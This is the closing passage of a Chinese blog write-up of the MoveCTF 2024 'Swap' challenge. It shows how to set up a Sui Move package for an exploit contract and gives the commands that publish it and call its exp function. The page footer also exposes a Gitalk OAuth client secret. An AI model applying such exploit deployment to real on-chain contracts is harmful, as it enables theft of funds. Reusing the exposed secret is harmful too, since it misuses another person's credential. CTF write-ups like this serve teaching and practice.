<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#首先创建一个新的包</span></span><br><span class="line">sui move new zoiltin_solve_swap</span><br><span class="line"><span class="comment">#文件结构如下：</span></span><br><span class="line"><span class="comment">#zoiltin_solve_swap/</span></span><br><span class="line"><span class="comment">#|                /sources/</span></span><br><span class="line"><span class="comment">#|                |        exp.move</span></span><br><span class="line"><span class="comment">#|                /Move.toml</span></span><br></pre></td></tr></table></figure>
<p>Move.toml内容如下：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[package]</span></span><br><span class="line"><span class="attr">name</span> = <span class="string">&quot;zoiltin_solve_swap&quot;</span></span><br><span class="line"><span class="attr">version</span> = <span class="string">&quot;0.0.1&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">Sui</span> = &#123; git = <span class="string">&quot;https://github.com/MystenLabs/sui.git&quot;</span>, subdir = <span class="string">&quot;crates/sui-framework/packages/sui-framework&quot;</span>, rev = <span class="string">&quot;framework/testnet&quot;</span> &#125;</span><br><span class="line"><span class="comment"># Sui = &#123; local =  &quot;/opt/sui/crates/sui-framework/packages/sui-framework&quot; &#125;</span></span><br><span class="line"><span class="attr">swap</span> = &#123; local = <span class="string">&quot;../swap&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line"><span class="section">[addresses]</span></span><br><span class="line"><span class="attr">zoiltin_solve_swap</span> = <span class="string">&quot;0x0&quot;</span></span><br><span class="line"><span class="attr">swap</span> = <span class="string">&quot;package_id&quot;</span></span><br><span class="line"><span class="attr">sui</span> = <span class="string">&quot;0x2&quot;</span></span><br></pre></td></tr></table></figure>
<p>addresses里面：0x0代表此包为之前发布，意思就是这次要发布的包。如果已经发布了就像题目中的swap包就写这个包的package_id</p>
<p>dependencies放源代码路径。</p>
<p>swap源码里的Move.toml文件也要改：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[package]</span></span><br><span class="line"><span class="attr">name</span> = <span class="string">&quot;swap&quot;</span></span><br><span class="line"><span class="attr">version</span> = <span class="string">&quot;0.0.1&quot;</span></span><br><span class="line"><span class="attr">published-at</span> = <span class="string">&quot;package_id&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">Sui</span> = &#123; git = <span class="string">&quot;https://github.com/MystenLabs/sui.git&quot;</span>, subdir = <span class="string">&quot;crates/sui-framework/packages/sui-framework&quot;</span>, rev = <span class="string">&quot;framework/testnet&quot;</span> &#125;</span><br><span class="line"><span class="comment"># Sui = &#123; local =  &quot;/opt/sui/crates/sui-framework/packages/sui-framework&quot; &#125;</span></span><br><span class="line"></span><br><span class="line"><span class="section">[addresses]</span></span><br><span class="line"><span class="attr">swap</span> = <span class="string">&quot;package_id&quot;</span></span><br></pre></td></tr></table></figure>

<p>在攻击合约目录下执行<br><code>sui client publish --with-unpublished-dependencies --skip-dependency-verification --gas-budget 1000000000</code>来发布包</p>
<p>然后调用攻击合约中的exp函数.<code>sui client call --package &lt;攻击合约的package_id&gt; --module exp --function exp --type-args &lt;那两个泛型&gt; --args &lt;那两个参数&gt; --gas-budget 10000000</code></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/write-up/" rel="tag"># write up</a>
              <a href="/tags/movectf-2024/" rel="tag"># movectf 2024</a>
              <a href="/tags/blockchains/" rel="tag"># blockchains</a>
              <a href="/tags/smart-contract/" rel="tag"># smart contract</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/11/22/%E7%9B%B2XXE%E4%B8%ADFTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8/" rel="prev" title="盲XXE中FTP协议的利用">
      <i class="fa fa-chevron-left"></i> 盲XXE中FTP协议的利用
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Checkin"><span class="nav-number">1.</span> <span class="nav-text">Checkin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DynamicMatrixTraversal"><span class="nav-number">2.</span> <span class="nav-text">DynamicMatrixTraversal</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Swap"><span class="nav-number">3.</span> <span class="nav-text">Swap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E9%97%AA%E7%94%B5%E8%B4%B7"><span class="nav-number">3.1.</span> <span class="nav-text">介绍一下闪电贷</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-number">3.2.</span> <span class="nav-text">题解</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6"><span class="nav-number">3.3.</span> <span class="nav-text">攻击合约:</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%83%A8%E7%BD%B2%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6"><span class="nav-number">3.4.</span> <span class="nav-text">部署攻击合约</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Zoiltin</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zoiltin</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '5d255510a11e0afdd868',
      clientSecret: '8252d818d311dbc47b2db2b855e02cb69df60cbd',
      repo        : 'BlogComments',
      owner       : 'zoiltin',
      admin       : ['zoiltin'],
      id          : 'fec5b8750cd32c7b8b3662de127206ad',
        language: 'ch-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
